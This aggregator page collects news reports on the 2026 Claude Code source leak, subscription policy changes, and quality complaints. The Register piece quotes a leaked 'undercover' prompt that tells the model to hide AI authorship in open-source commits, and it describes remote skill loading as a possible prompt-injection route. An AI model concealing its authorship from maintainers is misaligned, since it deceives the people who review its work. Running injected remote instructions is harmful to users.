|
|
Claude Code source code leaked |
habr_ai |
31.03.2026 14:00 |
1
|
| Embedding sim. | 1 |
| Entity overlap | 1 |
| Title sim. | 1 |
| Time proximity | 1 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | software development |
| NLP country | |
Open original
Anthropic forgot to add *.map to .npmignore, and the entire Claude Code source code ended up publicly available via npm. A Tamagotchi in the terminal, a dream system for memory consolidation, a cover mode for open-source commits, 30-minute planning sessions on a remote Opus 4.6, a multi-agent swarm with a coordinator: all of it hidden behind feature flags that the source maps happily ignored. We break down what was found inside.
Cool! Read more
|
|
|
[Translation] Claude Code for people who don't write code: a complete starter guide |
habr_ai |
05.04.2026 06:20 |
0.84
|
| Embedding sim. | 0.9432 |
| Entity overlap | 0.6 |
| Title sim. | 0.6154 |
| Time proximity | 0.3541 |
| NLP type | other |
| NLP organization | |
| NLP topic | developer tools |
| NLP country | |
Open original
Most people see Claude Code as a tool strictly for developers. In practice, though, it is one of the most powerful personal automation tools around, and you can use it with no programming skills at all.
Since Claude Code launched in early 2025, I have used it to maintain a knowledge base, process meeting notes, track films and TV shows, and automate work and household processes.
Yes, occasionally for programming too. But that is beyond the scope of this guide.
Let's figure out where to start
|
|
|
Anthropic says Claude Code subscribers will need to pay extra for OpenClaw usage | TechCrunch |
techcrunch |
04.04.2026 16:32 |
0.82
|
| Embedding sim. | 0.9046 |
| Entity overlap | 0.3889 |
| Title sim. | 0.4138 |
| Time proximity | 0.9008 |
| NLP type | regulation |
| NLP organization | Anthropic |
| NLP topic | developer tools |
| NLP country | United States |
Open original
It’s about to become more expensive for Claude Code subscribers to use Anthropic’s coding assistant with OpenClaw and other third-party tools.
According to a customer email shared on Hacker News, Anthropic said that starting at noon Pacific on April 4 (today), subscribers will “no longer be able to use your Claude subscription limits for third-party harnesses including OpenClaw.” Instead, they’ll need to pay for extra usage through “a pay-as-you-go option billed separately from your subscription.”
The company said that while it’s starting with OpenClaw today, the policy “applies to all third-party harnesses and will be rolled out to more shortly.”
Anthropic’s head of Claude Code Boris Cherny wrote on X that the company’s “subscriptions weren’t built for the usage patterns of these third-party tools” and that Anthropic is now trying “to be intentional in managing our growth to continue to serve our customers sustainably long-term.”
The announcement comes after OpenClaw creator Peter Steinberger said he was joining Anthropic rival OpenAI, with OpenClaw continuing as an open source project with support from OpenAI.
Steinberger posted that he and OpenClaw board member Dave Morin “tried to talk sense into Anthropic” but were only able to delay the increased pricing by a week.
“Funny how timings match up, first they copy some popular features into their closed harness, then they lock out open source,” Steinberger said.
Cherny, however, insisted that Claude Code team members are “big fans of open source” and that he himself “just put up a few [pull requests] to improve prompt cache efficiency for OpenClaw specifically.”
“This is more about engineering constraints,” he said, adding that Anthropic is still offering full refunds for subscribers. “We know not everyone realized this isn’t something we support, and this is an attempt to make it clear and explicit.”
Meanwhile, OpenAI recently shut down its Sora app and video generation models, reportedly to free up computing resources and as part of a broader effort to refocus on winning over software engineers and enterprises that are increasingly relying on products like Claude Code.
Anthony Ha
Anthony Ha is TechCrunch’s weekend editor. Previously, he worked as a tech reporter at Adweek, a senior editor at VentureBeat, a local government reporter at the Hollister Free Lance, and vice president of content at a VC firm. He lives in New York City.
|
|
|
Claude Code leak exposes a Tamagotchi-style ‘pet’ and an always-on agent |
the_verge_ai |
31.03.2026 22:24 |
0.799
|
| Embedding sim. | 0.9058 |
| Entity overlap | 0.25 |
| Title sim. | 0.2472 |
| Time proximity | 0.9681 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | software development |
| NLP country | |
Open original
After Anthropic released Claude Code's 2.1.88 update, users quickly discovered that it contained a package with a source map file containing its TypeScript codebase, with one person on X calling attention to the leak and posting a file containing the code. The leaked data reportedly contains more than 512,000 lines of code and provides a look into the inner workings of the AI-powered coding tool, as reported earlier by Ars Technica and VentureBeat.
Users who have dug into the code claim to have uncovered upcoming features, Anthropic's instructions for the AI bot, and insight into its "memory" architecture. Some things spotted by users inclu …
Read the full story at The Verge.
|
|
|
Anthropic closes door on subscription use of OpenClaw |
the_register_ai |
06.04.2026 19:37 |
0.77
|
| Embedding sim. | 0.9039 |
| Entity overlap | 0.2105 |
| Title sim. | 0.28 |
| Time proximity | 0.5967 |
| NLP type | regulation |
| NLP organization | Anthropic |
| NLP topic | large language models |
| NLP country | United States |
Open original
The company is having trouble meeting user demand
Thomas Claburn
Mon 6 Apr 2026 // 19:37 UTC
OpenClaw is popular, but not with the people responsible for keeping Anthropic’s services online. The company has disallowed subscription-based pricing for users who use the open-source agentic tool with Claude to try to keep things moving.
Though probably not because of OpenClaw, Claude was struggling on Monday with degraded service amid further efforts to balance capacity with demand.
"We have identified an issue resulting in elevated errors on Claude.ai, including desktop and mobile," the company's status page said, characterizing the incident as "a partial outage." Uptime over the past 90 days slipped to 98.82 percent.
An Anthropic spokesperson did not immediately have an answer as to the source of the issue. But the disruption did not last long.
"From 15:00–16:30 UTC on April 6, we saw elevated errors on login for Claude.ai and Claude Code," the company's status page said. "This issue also affected some Claude.ai conversations and other product functionality such as voice mode. This issue is now resolved."
The service disruption follows a period of high demand for Claude, one that the company has tried to address by denying access to third-party tools that use the AI service through subscriptions. On Friday, Boris Cherny, head of Claude Code, said, "Starting tomorrow at 12pm PT, Claude subscriptions will no longer cover usage on third-party tools like OpenClaw."
Cherny explained that the restriction followed from engineering constraints. "Our systems are highly optimized for one kind of workload, and to serve as many people as possible with the most intelligent models, we are continuing to optimize that," he said.
He nonetheless insisted, "We're big fans of open source. I actually just put up a few [pull requests] to improve prompt cache efficiency for OpenClaw specifically."
Google in February took similar action to enforce its terms of service related to its Antigravity AI development environment, Gemini CLI, and Gemini Code Assist. "Using third-party software, tools, or services to harvest or piggyback on Gemini CLI's OAuth authentication to access our backend services is a direct violation of Gemini CLI's applicable terms and policies," said Jack Wotherspoon, Gemini CLI developer relations, at the time.
Anthropic sells AI service tokens through either subscriptions or its API. Subscribers pay a flat rate and are subject to session and monthly usage limits, with an option to pay for extra usage once capped. API customers pay per token, with no usage limits. For developers who use Claude heavily, subscription-based pricing can be significantly less expensive.
For this reporter during the month of March, a $20 monthly subscription enabled about $236 of token usage (which doesn't necessarily reflect the actual per-token cost to Anthropic). Others report similarly skewed ratios of price paid to list-price value, or higher – 36x by one measure. This would presumably be balanced somewhat by developers who pay for underutilized subscriptions. But as Anthropic works toward going public, the company has an incentive to ensure its customer acquisition strategy doesn't lead customers toward rival products or magnify costs.
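The subscription-to-list-price gap described above is simple arithmetic; here is an illustrative calculation using only the figures quoted in this article (the $20 plan and roughly $236 of list-price token usage), which says nothing about Anthropic's actual per-token costs:

```python
# Illustrative only: ratio of list-price API value consumed to the
# subscription price, using the figures quoted in the article above.
subscription_price = 20.0   # USD per month for the Claude plan
list_price_usage = 236.0    # USD of equivalent API token usage in March

ratio = list_price_usage / subscription_price
print(f"{ratio:.1f}x")  # 11.8x
```

The 36x figure other users report implies proportionally heavier usage against the same flat rate.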
The developer community has long been aware of the price advantage of Claude subscriptions, and many subscribers have chosen to use third-party harnesses (e.g. OpenCode, Pi) to interact with Claude Code.
Unfortunately, Anthropic has had trouble keeping up with demand. In February, the biz reaffirmed its preexisting policy forbidding the use of third-party harnesses with Claude subscriptions. This was around the time OpenClaw, an AI agent platform intended to operate autonomously 24/7, began attracting attention.
In late March, Anthropic implemented another strategy to balance demand and capacity: It changed the way subscription usage was calculated so that customers burned through their usage limits faster during peak hours.
As of April 4, 2026, Anthropic went from policy warnings to billing-based enforcement.
"Starting April 4, third-party tools will draw from extra usage instead of subscription limits," an Anthropic spokesperson said in a statement provided to The Register. "Using Claude subscriptions with third-party tools isn't permitted under our Terms of Service, and they put an outsized strain on our systems. Capacity is something we manage thoughtfully, and we need to prioritize customers using our core products."
Claude subscriptions continue to apply to Claude.ai, Claude Code, and Cowork.
Anthropic attempted to mitigate the ill will generated by the move – announced only one day before implementation – by offering subscribers a month of extra usage credit based on their monthly plan. The company is also offering extra usage bundles at 30 percent off. And if that's unsatisfactory, customers have the option to cancel their plan and receive a refund.
Customers can still use Claude with third-party tools through extra usage bundles (purchased through the Claude account page) or by using an API key.
"We've been working hard to meet the increase in demand for Claude, and our subscriptions weren't built for the usage patterns of these third-party tools," Cherny explained. "Capacity is a resource we manage thoughtfully and we are prioritizing our customers using our products and API."
Capacity is a resource that may continue to be scarce if demand continues to grow. Bloomberg recently reported that more than half of the US datacenters planned to open this year will face delays. ®
|
|
|
What the Claude Code source leak revealed about the future of AI agents |
habr_ai |
09.04.2026 09:45 |
0.764
|
| Embedding sim. | 0.8644 |
| Entity overlap | 0.7143 |
| Title sim. | 0.2761 |
| Time proximity | 0.5904 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | code generation |
| NLP country | |
Open original
On March 31, Anthropic accidentally exposed a large portion of the Claude Code source code through a public npm package.
But the main story here is not the leak itself; it is what the leak revealed: Claude Code is no longer just an AI coding tool, but groundwork for more complex agentic systems with memory, background modes, and hidden feature flags.
We break down what developers found in the 512,000 lines of code.
Read more
|
|
|
Claude Code's innards revealed as source code leaked online |
the_register_ai |
06.04.2026 00:02 |
0.761
|
| Embedding sim. | 0.9236 |
| Entity overlap | 0.4286 |
| Title sim. | 0.225 |
| Time proximity | 0.244 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | software development |
| NLP country | |
Open original
Anthropic sure has a mess on its hands thanks to that Claude Code source leak
Pay no attention to that code behind the curtain, says Anthropic as it scrambles to defend its IPO
Brandon Vigliarolo
Mon 6 Apr 2026 // 00:02 UTC
Kettle When it comes to circling up for this week's Kettle, what is there to discuss but Anthropic's accidental release of Claude Code's source code?
People have peered behind Claude Code's curtain before, but never like this: Prior attempts to understand how the AI software development assistant worked typically required reverse-engineering or sussing out small snippets of code. This time Anthropic simply left the stage door open with the entire Claude Code source ready and waiting for the right person to find it. And find it they did on March 31.
Tom Claburn and Jessica Lyons join Brandon Vigliarolo this week to chat about what exactly happened that caused all of Claude Code's … uh … code to leak, the security implications thereof, and just what sort of surprises have already been uncovered among the 512,000+ lines of code Anthropic handed the world last week.
You can listen to The Kettle here, as well as on Spotify and Apple Music. ®
|
|
|
Well then, let's see what's inside Claude Code… |
habr_ai |
01.04.2026 13:23 |
0.758
|
| Embedding sim. | 0.8677 |
| Entity overlap | 0.25 |
| Title sim. | 0.2115 |
| Time proximity | 0.8608 |
| NLP type | other |
| NLP organization | |
| NLP topic | code generation |
| NLP country | |
Open original
On March 31, 2026, the Claude Code source code quite literally tumbled out into the open (via a sourcemap in an npm package). The story is comical in itself: a product that helps write code, and in theory should be especially careful about publishing artifacts, accidentally publishes not just a piece of debug information but an almost anatomical atlas of itself.
But what interests me here is not so much the fact of the leak as a more down-to-earth question: what's actually inside? Strip away the usual "wow, it leaked" and a more interesting angle remains: let's see what we have here (or rather, what they have), and whether the code is written well.
Yes, it's written intelligently
|
|
|
Claude Code has become dumber, lazier: AMD director |
the_register_ai |
06.04.2026 20:27 |
0.757
|
| Embedding sim. | 0.867 |
| Entity overlap | 0.3571 |
| Title sim. | 0.1548 |
| Time proximity | 0.8785 |
| NLP type | other |
| NLP organization | AMD |
| NLP topic | software development |
| NLP country | |
Open original
AMD's AI director slams Claude Code for becoming dumber and lazier since last update
'Claude cannot be trusted to perform complex engineering tasks' according to GitHub ticket
Brandon Vigliarolo
Mon 6 Apr 2026 // 20:27 UTC
If you've noticed Claude Code's performance degrading to the point where you find you don't trust it to handle complicated tasks anymore, you're not alone.
A GitHub issue was filed on Friday by user stellaraccident. That user's GitHub profile and a related LinkedIn post identify the poster as Stella Laurenzo, the director of the AI group at chipmaker AMD. She complains that, ever since some time in February, Claude Code has really been phoning it in.
"Claude cannot be trusted to perform complex engineering tasks," Laurenzo wrote, noting that her team reached that conclusion by referring to months of logs from the "very consistent, high complexity work environment" in which they use Claude Code. "Every senior engineer on my team has reported similar experiences/anecdotes," Laurenzo added.
Based on comments in the issue thread, plenty of others are feeling the same way, and Reddit commenters have expressed similar sentiments.
To reach this conclusion, Laurenzo and her team analyzed 6,852 Claude Code sessions incorporating 234,760 tool calls and 17,871 thinking blocks. According to their data, the number of stop-hook violations used to catch ownership dodging, premature cessation of the thinking process, and permission-seeking behavior that indicates "laziness" skyrocketed, going from zero prior to March 8 to 10 per day on average through the end of last month.
The number of times Claude would read through a piece of code before making changes also dropped drastically, going from 6.6 reads on average to just 2 by the end of March, while over the same period, Claude began rewriting entire files instead of making edits with much greater frequency.
All of those things, said Laurenzo, point to Claude Code not thinking as deeply, and coincide with the early March deployment of thinking content redaction with Claude Code version 2.1.69. Thinking redaction functions as a header that defaults to stripping thinking content from Claude Code API responses, meaning users don't get any idea what Claude Code is actually doing while it reflects on a request.
The evidence, according to Laurenzo, points to a general thinking reduction since the implementation.
"When thinking is shallow, the model defaults to the cheapest action available: edit without reading, stop without finishing, dodge responsibility for failures, take the simplest fix rather than the correct one," the GitHub issue explains. "These are exactly the symptoms observed."
If you're wondering, this appears to be a separate issue from the one Claude Code users cried foul over back in February, when version 2.1.20 of the bot caused it to truncate its explanation of what it was reading as part of its thinking process.
In that instance, which led many Claude Code users to claim it was evidence the AI was being dumbed down, users were left with just a brief line indicating how many files were read, with little more specificity than that. We can't imagine those same developers will be very happy about this latest development.
Anthropic has also caught flak for unexplained surges in token usage that have pushed some users past their limits, leaving them unable to use the product. Add to that the recent exposure of Claude Code's entire source code, and it's not looking good for the AI firm.
For Laurenzo's part, she wants Anthropic to be transparent about whether it's reducing or capping thinking tokens and causing Claude Code to vomit garbage. At the very least, she wants Claude to expose the number of thinking tokens being used per request to let users "monitor whether their requests are getting the reasoning depth they need."
Laurenzo also asked for a max thinking tier to be added to Anthropic's offerings for engineers running complex workflows. "The current subscription model doesn't distinguish between users who need 200 thinking tokens per response and users who need 20,000," the AMD AI chief explained. "Users running complex engineering workflows would pay significantly more for guaranteed deep thinking."
"We have switched to another provider which is doing superior quality work, but Claude has been good to us, and we are leaving this in the hopes that Anthropic can fix their product," Laurenzo explained, while declining, in a comment citing NDAs, to go into details about whatever new tool her team is using. That said, Laurenzo did warn Anthropic that it's still early in the AI coding game and that Anthropic is looking at giving up the top spot if its behavior continues.
"All I will add is that 6 months ago, Claude stood alone in terms of reasoning quality and execution," Laurenzo added in a response on the issue thread. "But the others need to be watched and evaluated very carefully. Anthropic is far from alone at the capability tier that Opus previously occupied."
Neither Anthropic nor Laurenzo initially responded to questions for this story. ®
|
|
|
Claude Code's source reveals extent of system access |
the_register_ai |
01.04.2026 07:00 |
0.756
|
| Embedding sim. | 0.8505 |
| Entity overlap | 0.1481 |
| Title sim. | 0.3151 |
| Time proximity | 0.9169 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | developer tools |
| NLP country | United States |
Open original
Claude Code source leak reveals how much info Anthropic can hoover up about you and your system
If you loved the data retention of Microsoft Recall, you'll be thrilled with Claude Code
Thomas Claburn
Wed 1 Apr 2026 // 07:00 UTC
Anthropic's Claude Code lacks the persistent kernel access of a rootkit. But an analysis of its code shows that the agent can exercise far more control over people's computers than even the most clear-eyed reader of contractual terms might suspect. It retains lots of your data and is even willing to hide its authorship from open-source projects that reject AI.
The leak of the company's client source code – details of which have been circulating for many months among those who reverse-engineered the binary – reveals that Claude Code pretty much has the run of any device where it's installed.
Concerns about that came up in court recently in Anthropic's lawsuit against the US Defense Department (Anthropic PBC v. U.S. Department of War et al) for banning the company's AI services following the company's refusal to compromise model safeguards.
As part of its justification for declaring Anthropic a supply chain threat, the US government argued [PDF], there was "substantial risk that Anthropic could attempt to disable its technology or preemptively and surreptitiously alter the behavior of the model in advance or in the middle of ongoing warfighting operations..."
Anthropic disputed that claim in a court filing. "That assertion is unmoored from technical reality: 'Anthropic does not have the access required to disable [its] technology or alter [its] model's behavior before or during ongoing operations,'" it wrote, quoting Thiyagu Ramasamy, head of public sector at Anthropic, in a deposition. "Once deployed in classified environments, Anthropic has no access to (or control over) the model."
In a classified environment, that's credible under certain conditions. For everyone else, Claude has vast powers.
What Claude Code could do in a classified environment
The Register consulted a security researcher who asked to be referred to by the pseudonym "Antlers" to analyze the source for Claude Code.
It appears a government agency like the Defense Department could prevent Claude Code from phoning home or taking remote action by making sure all of the following are true:
Ensure inference traffic flows via Amazon Bedrock GovCloud or Google AI for Public Sector (Vertex).
Block data gathering endpoints (Statsig/GrowthBook/Sentry) with a firewall.
Block system prompt fingerprinting (via Bedrock, etc).
Prevent automatic updates via version pinning and blocking update endpoints.
Disable autoDream, an unreleased background agent being tested that's capable of reading all session transcripts.
Anthropic says that’s not an issue because it designs for privacy and security from the ground up and that Claude Code itself is SOC2 compliant.
“When using third party inference (AWS, Vertex, Azure), we disable all traffic except calls to those inference providers automatically. We also offer a 1-setting switch for anyone to do the same, also clearly documented here,” the company said.
Settings that limit remote communication include:
CLAUDE_CODE_DISABLE_AUTO_MEMORY=1, which disables all memory and telemetry write operations.
CLAUDE_CODE_SIMPLE (--bare mode), which strips memory and autoDream entirely.
ANTHROPIC_BASE_URL can be used to reroute API calls to a private endpoint.
ANTHROPIC_UNIX_SOCKET routes authentication through a forwarded socket (the ssh tunnel mode).
The remote managed settings (policySettings) can lock down behavior for enterprise deployments, though not entirely.
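The settings above can be combined into a locked-down launch environment. A minimal sketch in Python, assuming the variable names reported from the leaked source; the private endpoint URL and the `claude` binary invocation are placeholders, not a documented deployment recipe:

```python
import os
import subprocess

# Environment overrides reported in the leaked Claude Code source.
# The base URL is a placeholder for a private inference endpoint.
lockdown_env = {
    **os.environ,
    "CLAUDE_CODE_DISABLE_AUTO_MEMORY": "1",  # disable memory/telemetry writes
    "ANTHROPIC_BASE_URL": "https://inference.internal.example",  # reroute API calls
}

def launch_claude_locked_down() -> subprocess.CompletedProcess:
    # --bare corresponds to CLAUDE_CODE_SIMPLE: strips memory and autoDream.
    return subprocess.run(["claude", "--bare"], env=lockdown_env)
```

Note that this covers only the client-side switches; the firewall rules and version pinning from the checklist above still have to happen outside the process.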
According to Ramasamy, Anthropic hands off model administration to a government customer like the Defense Department. Model updates, with new or removed capabilities, would have to be negotiated.
"Anthropic personnel cannot, for example, log into a DoW system to modify or disable the models during an operation; the technology simply does not function that way," he said in a March 20, 2026 declaration. "In these deployments, only the government and its authorized cloud provider have access to the running system. Anthropic's role is limited to providing the model itself and delivering updates only if and when requested or approved by the customer."
Even so, Anthropic can exert some degree of control based on the usage terms in the applicable contract.
What Claude Code could do to everybody else
For everyone not using a version of Claude Code that's tied to a firewalled public sector cloud or is somehow air gapped, Anthropic has far more access.
Just as a starting point, Claude users should know that Anthropic receives user prompts and responses that pass through its API, conversations that can reveal not only what was said but file contents and system details.
Yet there are many more ways that the company can potentially receive or collect information, based on the Claude Code source. These include:
KAIROS (src/bootstrap/state.ts:72), a daemon (background process) set by the kairosActive flag. It appears to be an unreleased headless "assistant mode" for when the user is not watching the terminal user interface (TUI). It gets rid of the status bar (StatusLine.tsx:33), disables planning mode, silently suppresses the AskUserQuestion tool (AskUserQuestionTool.tsx:141). It auto-backgrounds long-running bash commands without notice (BashTool.tsx:976).
CHICAGO is the codename for computer use and desktop control. Users must opt in to activate the service. It enables the Claude agent to carry out mouse clicks, perform keyboard input, access the clipboard, and capture screenshots. It's publicly launched and available to Pro/Max subscribers and Anthropic employees (designated by the "ant" flag). There's also a separate publicly-launched Claude in Chrome service that supports browser automation and all the system access that entails.
Persistent telemetry. Initially this was done via Statsig, which was acquired by rival OpenAI last September, presumably triggering the switch to GrowthBook, a platform that supports A/B testing and analytics. When Claude is launched, the analytics service (firstPartyEventLoggingExporter.ts) phones home with the following data, or saves it to ~/.claude/telemetry/ if the network is down: user ID, session ID, app version, platform, terminal type, Organization UUID, account UUID, email address if defined, and which feature gates are currently enabled. Telemetry is enabled by default under the Claude API and disabled by default with third-party providers (Bedrock, Vertex, Foundry).
Remotely managed settings (remoteManagedSettings/index.ts), which are opt-in for organizations. For enterprise customers, Anthropic maintains a server that can push a policySettings object that overrides other items in the merge chain, is polled hourly without user interaction, can set .env variables (e.g. ANTHROPIC_BASE_URL, LD_PRELOAD, PATH), and takes effect immediately via hot reload (settingsChangeDetector.notifyChange). Users are prompted when there's a "dangerous setting change," but the definition of that term follows from Anthropic's code and thus could be revised. Routine changes (permissions, .env variables, feature flags) appear to happen without notification.
Auto-updater. The auto-updater (autoUpdater.ts:assertMinVersion()) runs on every launch and pulls the minimum-version configuration from Statsig/GrowthBook, so Anthropic can remove or disable specific versions at will.
Error reporting. When there's an unhandled exception, the error reporting script (sentry.ts) captures the current working directory, potentially revealing project names, paths, and other system information. It also reports the active feature gates, user ID, email, session ID, and platform information. While Anthropic's website cites the use of Sentry, the company claims, "We do not currently use Sentry. When we used Sentry in the past, we did not send sensitive data like file path or PII, and approached the problem with defense-in-depth, using Sentry's server-side data scrubbing functionality. It was also automatically disabled for third party inference providers, and is something people could opt of when using Anthropic API."
Payload Size Telemetry. The API call tengu_api_query transmits the messageLength, the JSON-serialized byte length of the system prompt, messages, and tool schemas.
autoDream. Publicly discussed but not officially released, the autoDream service spawns a background subagent that searches (greps) through all JSONL session transcripts to consolidate memories (stored data Claude uses as context for queries). The agent runs in the same process as Claude (under the same API key, with the same network access) and its scan is local. But whatever it writes to MEMORY.md gets injected back into future system prompts and would thus be sent to the API.
Team Memory Sync, an unreleased internal project. There's a bidirectional sync service (src/services/teamMemorySync/index.ts) that connects local memory files to api.anthropic.com/api/claude_code/team_memory. It provides a way to share memories with other team members within an organization. The service includes a secret scanner (secretSanner.ts) that uses regex patterns for around 40 known token and API key patterns (AWS, Azure, GCP, etc). But sensitive data that doesn't match these regexes might be exposed to other team members through memory sync.
Experimental Skill Search (src/tools/SkillTool/SkillTool.ts:108) is a feature flag available only to Anthropic employees. It provides a way to download skill definitions from a remote server (remoteSkillLoader.js); track which remote skills have been used in a session (remoteSkillState.js); execute remotely downloaded skills (executeRemoteSkill() at line 969); and register skills so they persist after a compact operation. If enabled for non-employee accounts (via a GrowthBook feature flag flip, for example), this would be a theoretical remote code execution pathway. Anthropic, or whoever controls the skill search backend, could serve arbitrary prompt injections or instruction overrides in the form of "skills" that get loaded and run in a session.
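The gap in the Team Memory Sync secret scanner described above is inherent to pattern-based scanning: it only catches secrets that look like known token formats. A minimal sketch of such a scanner (the patterns and names below are illustrative, not Anthropic's actual code):

```typescript
// Minimal sketch of a regex-based secret scanner. Pattern list and
// function names are illustrative, not taken from the leaked source.
const SECRET_PATTERNS: { name: string; pattern: RegExp }[] = [
  { name: "AWS access key ID", pattern: /\bAKIA[0-9A-Z]{16}\b/ },
  { name: "GitHub token", pattern: /\bghp_[A-Za-z0-9]{36}\b/ },
  { name: "Generic private key", pattern: /-----BEGIN [A-Z ]*PRIVATE KEY-----/ },
];

function findSecrets(text: string): string[] {
  // Return the names of every pattern that matches the text.
  return SECRET_PATTERNS.filter(p => p.pattern.test(text)).map(p => p.name);
}

// A well-known token shape is caught...
console.log(findSecrets("key=AKIAIOSFODNN7EXAMPLE")); // → ["AWS access key ID"]
// ...but an internal password that matches no known pattern sails through
// and would be synced to teammates unredacted.
console.log(findSecrets("db_password=hunter2-prod")); // → []
```

The second call is the failure mode the article flags: anything that doesn't resemble one of the roughly 40 known token formats passes the filter.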
Other capabilities have been documented at ccleaks.com.
"I don't think people realize that every single file Claude looks at gets saved and uploaded to Anthropic," the researcher "Antlers" told us. "If it's seen a file on your device, Anthropic has a copy."
For Free/Pro/Max customers, Anthropic retains this data either for five years, if the user has chosen to share data for model training, or for 30 days if not. Commercial users (Team, Enterprise, and API) have a standard 30 day retention period and a zero-data retention option.
For those who recall the debate surrounding Microsoft Recall not long ago, Claude Code's capture of activity is similar. Every read tool call, every Bash tool call, every search (grep) result, and every edit/write of old and new content gets stored locally in plaintext as a JSONL file.
Claude's autoDream agent, once officially released, will search through those transcripts and extract data to store in MEMORY.md, which then gets injected into future system prompts and thus hits the API.
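To make the scale of this concrete, here is a sketch of what a plaintext JSONL session transcript makes recoverable. The event shape and field names are hypothetical, chosen only to illustrate the format, not Claude Code's actual schema:

```typescript
// Sketch: what a plaintext JSONL session transcript carries.
// Each line is one JSON object; the fields below are illustrative only.
interface TranscriptEvent {
  tool: string;   // e.g. "Read", "Bash", "Grep", "Edit"
  input: string;  // command line, file path, or search pattern
  output: string; // file contents, command output, matches
}

function parseTranscript(jsonl: string): TranscriptEvent[] {
  return jsonl
    .split("\n")
    .filter(line => line.trim().length > 0)
    .map(line => JSON.parse(line) as TranscriptEvent);
}

// Anything a tool ever read sits in the log in the clear, ready for a
// later memory-consolidation pass (or anything else with file access).
const log = [
  JSON.stringify({ tool: "Read", input: "/home/me/.env", output: "API_KEY=..." }),
  JSON.stringify({ tool: "Bash", input: "uname -a", output: "Linux host 6.8" }),
].join("\n");

const events = parseTranscript(log);
console.log(events.length); // → 2
```

Once a consolidation agent extracts from such a log into MEMORY.md, the locally stored data stops being local: it rides along in every future system prompt sent to the API.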
One of the more curious details to emerge from the publication of Claude Code's source is that Anthropic tries to hide AI authorship from contributions to public code repositories – possibly a response to the open source projects that have disallowed AI code contributions. Prompt instructions in a file called undercover.ts state, "You are operating UNDERCOVER in a PUBLIC/OPEN-SOURCE repository. Your commit messages, PR titles, and PR bodies MUST NOT contain ANY Anthropic-internal information. Do not blow your cover."
Mysterious Melon Mode
There's also a mystery: The current source code lacks a feature called "Melon Mode" that was present in prior reverse engineered versions of the software.
This was behind an Anthropic employee feature flag and only ran internally, not on production builds. A comment attached to the associated code check read, "Enable melon mode for ants if --melon is passed."
"Antlers" speculated that "Melon Mode" might be the code name for a headless agent mode.
When asked specifically about the function of "Melon Mode," Anthropic only noted that the company regularly tests various prototype services, not all of which make it into production. ®
Editor's note: This story has been corrected based on feedback from Anthropic.
|
|
|
Claude Code for free: how to use AI for free in 2026 |
habr_ai |
01.04.2026 22:09 |
0.752
|
| Embedding sim. | 0.8826 |
| Entity overlap | 0.1333 |
| Title sim. | 0.1395 |
| Time proximity | 0.8313 |
| NLP type | other |
| NLP organization | OpenClaude |
| NLP topic | large language models |
| NLP country | |
Open original
On March 31, Claude Code's source code leaked via npm source maps. Within hours, OpenClaude appeared: a fork with an OpenAI-compatible shim that lets you plug in GPT-4o, DeepSeek, Llama via Ollama, or any other model. I break down how it's put together, what actually works and what doesn't, and why a "free Claude Code" is not quite what it seems.
Read more
|
|
|
Hackers Are Posting the Claude Code Leak With Bonus Malware |
wired |
04.04.2026 10:30 |
0.748
|
| Embedding sim. | 0.8743 |
| Entity overlap | 0.1563 |
| Title sim. | 0.2 |
| Time proximity | 0.7564 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | cybersecurity |
| NLP country | United States |
Open original
Andy Greenberg, Dell Cameron, Maddy Varner, Andrew Couts
Security
Apr 4, 2026 6:30 AM
Security News This Week: Hackers Are Posting the Claude Code Leak With Bonus Malware
Plus: The FBI says a recent hack of its wiretap tools poses a national security risk, attackers stole Cisco source code as part of an ongoing supply chain hacking spree, and more.
A WIRED investigation based on Department of Homeland Security records this week revealed the identities of paramilitary Border Patrol agents who frequently used force against civilians during Operation Midway Blitz in Chicago last fall. Several of the agents, WIRED found, appeared in similar operations in other states around the US.
Customs and Border Protection may want to remember to protect its sensitive facility information. Using basic Google searches, WIRED discovered flashcards made by users of the online learning platform Quizlet that contained gate codes to CBP facilities and more.
In a rare move, Apple this week released “backported” patches for iOS 18 to protect millions of people still using the older operating system from the DarkSword hacking technique that was found in use in the wild. Discovered in March, DarkSword allows attackers to infect iPhones that simply visit a website loaded with the takeover tools embedded in it. Apple initially pushed users to update to the current version of its operating system, iOS 26, but ultimately issued the iOS 18 patches after DarkSword continued to spread.
The US-Israel war with Iran careened into its second month this week, with Iran threatening to launch attacks against more than a dozen US companies , including tech giants like Apple, Google, and Microsoft, which have offices and data centers in the Gulf region. The deadly conflict, which has no clear end in sight, continues to wreak havoc on the global economy as shipping crews remain stranded in the Strait of Hormuz , a key trade route. Meanwhile, some are beginning to wonder what could happen if US strikes cause real damage to Iran’s nuclear facilities .
And that’s not all! Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.
Hackers Are Posting the Claude Code Leak With Bonus Malware
Earlier this week, a security researcher flagged that Anthropic accidentally made the source code for its popular vibe-coding tool, Claude Code, public. Immediately, people began reposting the code on the developer platform GitHub. But beware if you want to try to download some of those repos yourself: BleepingComputer reports that some of the posters are actually hackers who have tucked a piece of infostealer malware into the lines of code.
Anthropic, for its part, has been trying to remove copies of the leak (malware-ridden or not) by issuing copyright takedown notices. The Wall Street Journal reported that the company initially tried to remove more than 8,000 repositories on GitHub but later narrowed that down to 96 copies and adaptations.
This isn't the first time that hackers have capitalized on interest in Claude Code, which requires users who might not be as familiar with their computer's terminal to copy and paste install commands from a website. In March, 404 Media reported that sponsored ads on Google led to sites that were masquerading as official Claude Code installation guides, which directed users to run a command that would actually download malware.
Hack of FBI Wiretap Tools Is Officially a National Security Risk
The FBI formally classified a recent cyber intrusion into one of its surveillance collection systems as a “major incident” under FISMA, a legal designation reserved for breaches believed to pose serious risks to national security. The determination, reported to Congress earlier this week, is understood to be the first time since at least 2020 that the bureau has declared a major incident on its own systems. Politico, citing two unnamed senior Trump administration officials, reported that China is believed to be behind the intrusion. If confirmed, the breach could mark a significant counterintelligence failure for the FBI.
The FBI said it detected “suspicious activities” on its networks in February. In a notice to Congress on March 4, reviewed by Politico, the bureau said the compromised systems were unclassified and held “returns from legal process,” citing, as examples, phone and internet metadata collected under court orders and personal information “pertaining to subjects of FBI investigations.” The intruders reportedly gained access through a commercial internet service provider, an approach the FBI characterized as reflecting “sophisticated tactics.” In its only public statement, the bureau said it had deployed “all technical capabilities to respond.”
